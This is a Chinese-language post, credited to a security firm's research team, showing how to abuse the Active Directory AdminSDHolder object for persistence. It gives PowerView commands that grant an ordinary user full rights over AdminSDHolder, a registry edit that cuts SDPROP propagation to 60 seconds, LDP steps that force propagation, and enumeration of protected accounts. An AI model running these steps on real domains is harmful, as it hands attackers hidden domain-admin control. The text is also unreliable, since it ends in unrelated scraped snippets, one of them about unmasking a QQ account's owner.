AdminSDHolder是一个特殊的AD容器,通常作为某些特权组成员的对象的安全模板。Active Directory将采用AdminSDHolder对象的ACL并定期将其应用于所有受保护的AD账户和组,以防止意外和无意的修改并确保对这些对象的访问是安全的。
本文由锦行科技的安全研究团队提供,旨在从攻击者的视角还原AdminSDHolder的渗透过程。
在域控上操作AdminSDHolder对象的ACL
添加用户test对AdminSDHolder的完全访问权限
powerview:
Add-DomainObjectAcl -TargetIdentity AdminSDHolder -PrincipalIdentity test -Rights All
*由于SDPROP的原因,默认等待60分钟之后生效
Powerview:
Get-DomainObjectAcl adminsdholder | ?{$_.SecurityIdentifier -match "S-1-5-21-363618500-3918876104-3124729890-1139"} | select objectdn,ActiveDirectoryRights |sort -Unique
ADSI:
Remove-DomainObjectAcl -TargetSearchBase "LDAP://CN=AdminSDHolder,CN=System,DC=test,DC=com" -PrincipalIdentity test -Rights All -Verbose
为了将可继承ACE的更改传播到后代对象,域控制器运行一个称为安全描述符传播器(SDPROP)的后台任务。通过修改对象的安全描述符或移动对象时触发此任务。当修改了AdminSDHolder的ACL之后默认等待60分钟以后生效,原理是SDPROP进程在PDC模拟器上每60分钟运行一次,并使用AdminSDHolder设置的安全权限重新标记ACL。
修改成等待60秒
reg add hklm\SYSTEM\CurrentControlSet\Services\NTDS\Parameters /v AdminSDProtectFrequency /t REG_DWORD /d 60
运行->LDP.exe->菜单>连接->连接->服务器输入当前的机器名,端口默认为389
然后连接->绑定凭证->作为当前登录的用户绑定->然后浏览->修改,在属性选项卡中输入FixUpInheritance。在值字段中输入Yes。操作选择添加,然后单击输入,最后运行即可,运行。
已经获得域控权限,利用AdminSDHolder来进行权限维持,或者寻找受保护AD账户为目标。
枚举受保护AD账户
Get-NetUser -AdminCount |select samaccountname
登录test用户,可以看到test非域管组,却能执行域管权限的命令。
黑客都上哪找联系方式相关问题 黑客必须要会英文吗相关问题 为什么黑客会攻击矿机 人肉qq号主信息(只知道qq号怎么人肉)...
洒脱的网名(简单又潇洒的网名) 懂得太多,看得太透,就会变成世界的孤儿。今日,可爱点小编准备了简单随意洒脱的网名,大家一起来看看吧~自我主宰最远旳距离风逝无迹万重烟水共老河山今朝酒醒不归处妄定义字当...
微信、微博、抖音、贴吧、这些产品就像一根根的大树,社群运营就是这些大树上的爬山虎,分销裂变就是这爬山虎的枝枝蔓蔓。所以树是什么样子的爬山虎就是什么样子的,枝枝蔓蔓多了长得才茂密。 这个流量匮乏的年代...
本文导读目录: 1、黑客帝国游戏要求的最底配制是多少? 2、玩黑客帝国:尼奥之路的配置 3、我的电脑这样的配置可玩黑客帝国2吗 4、请问诸位:黑客帝国:尼奥之路对显卡有什么特殊要求吗?一定...
此刻许多人因为征信低,银行不可以或许给以贷款而发愁。偏偏此刻就有可以或许通过芝麻分来贷款的渠道,这样贷款也是可以或许处理惩罚经济缺少的问题。仅仅有一点,这样的贷款需要一些大型的渠道才气够,必然要牢固的...
猫咪睡觉时为什么把身体蜷成团6月30日蚂蚁庄园每日一题的答案是什么?回答正确的话就可以领取180g小鸡饲料了,小伙伴们一起来看看今天的正确答案吧! 支付宝蚂蚁庄园6月30日问题: 猫咪睡觉时为什么...